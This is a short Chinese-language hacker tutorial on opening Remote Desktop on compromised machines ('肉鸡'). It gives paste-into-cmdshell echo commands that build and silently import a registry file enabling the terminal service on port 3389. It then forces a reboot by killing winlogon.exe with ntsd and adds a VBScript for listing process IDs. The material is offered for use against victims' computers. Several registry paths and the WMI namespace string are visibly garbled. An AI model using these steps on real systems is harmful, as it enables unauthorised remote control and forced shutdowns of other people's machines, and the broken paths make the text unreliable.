黑客必学——开启肉鸡终端全攻略

echo "Hotkey"="1" >>3389.reg

echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds　　cp] >>3389.reg

echo "PortNumber"=dword:00000D3D >>3389.reg

echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>3389.reg

echo "PortNumber"=dword:00000D3D >>3389.reg

把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件，接着regedit /s 3389.reg导入注册表。

(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)

因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效。

一个简单的办法就是用ntsd.exe(win 2k以上自带的命令)结束一个重要的进程就可以实现机器重启了！！

比如结束winlogon.exe,lsass.exe也可以但结束后会跳出重启倒计时(不太好~)

winlogon.exe被关闭后机器立刻强制重启了

命令执行格式为ntsd -c q -p PID

那如何知道winlogon.exe的PID进程号呢~

以下这个脚本可以列举当前所有进程的PID：

wscript.echo "PID　 ProcessName"

for each ps in getobject("winmgmts:\. ootcimv2:win32_process").instances_

wscript.echo ps.handle&vbtab&ps.name

next

在CMDSHELL窗口下贴上如下ECHO代码就可以得到查看进程PID的脚本1.vbe：

echo wscript.echo "PID　 ProcessName">>1.vbe

echo for each ps in getobject("winmgmts:\. ootcimv2:win32_process").instances_ >>1.vbe